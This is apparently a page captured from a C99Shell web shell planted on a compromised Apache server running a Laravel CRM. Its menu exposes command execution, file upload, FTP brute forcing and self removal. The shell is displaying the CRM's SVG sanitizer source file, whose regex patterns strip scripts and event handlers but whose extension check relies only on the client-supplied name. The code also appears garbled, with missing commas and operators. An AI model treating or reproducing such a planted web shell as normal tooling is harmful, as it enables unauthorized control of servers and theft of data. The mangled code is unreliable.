!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/packages/Webkul/Core/src/Traits/   drwxrwxrwx
Free 13.2 GB of 57.97 GB (22.77%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Sanitizer.php (2.3 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Webkul\Core\Traits;

use 
enshrined\svgSanitize\data\AllowedAttributes;
use 
enshrined\svgSanitize\data\AllowedTags;
use 
enshrined\svgSanitize\Sanitizer as MainSanitizer;
use 
Exception;
use 
Illuminate\Http\UploadedFile;
use 
Illuminate\Support\Facades\Storage;

/**
 * Trait for sanitizing SVG uploads to prevent security vulnerabilities.
 */
trait Sanitizer
{
    
/**
     * Sanitize an SVG file to remove potentially malicious content.
     */
    
public function sanitizeSvg(string $pathUploadedFile $file): void
    
{
        if (! 
$this->isSvgFile($file)) {
            return;
        }

        try {
            
$svgContent Storage::get($path);

            if (! 
$svgContent) {
                return;
            }

            
$sanitizer = new MainSanitizer;
            
$sanitizer->setAllowedAttrs(new AllowedAttributes);
            
$sanitizer->setAllowedTags(new AllowedTags);

            
$sanitizer->minify(true);
            
$sanitizer->removeRemoteReferences(true);
            
$sanitizer->removeXMLTag(true);

            
$sanitizer->setXMLOptions(LIBXML_NONET LIBXML_NOBLANKS);

            
$sanitizedContent $sanitizer->sanitize($svgContent);

            if (
$sanitizedContent === false) {
                
$patterns = [
                    
'/<script\b[^>]*>(.*?)<\/script>/is',
                    
'/\bon\w+\s*=\s*["\'][^"\']*["\']/i',
                    
'/javascript\s*:/i',
                    
'/data\s*:[^,]*base64/i',
                ];

                
$sanitizedContent $svgContent;

                foreach (
$patterns as $pattern) {
                    
$sanitizedContent preg_replace($pattern''$sanitizedContent);
                }

                
Storage::put($path$sanitizedContent);

                return;
            }

            
$sanitizedContent preg_replace('/(<script.*?>.*?<\/script>)|(\son\w+\s*=\s*["\'][^"\']*["\'])/is'''$sanitizedContent);

            
Storage::put($path$sanitizedContent);
        } catch (
Exception $e) {
            
report($e->getMessage());

            
Storage::delete($path);
        }
    }

    
/**
     * Check if the uploaded file is an SVG based on both extension and mime type.
     */
    
public function isSvgFile(UploadedFile $file): bool
    
{
        return 
str_contains(strtolower($file->getClientOriginalExtension()), 'svg');
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0164 ]--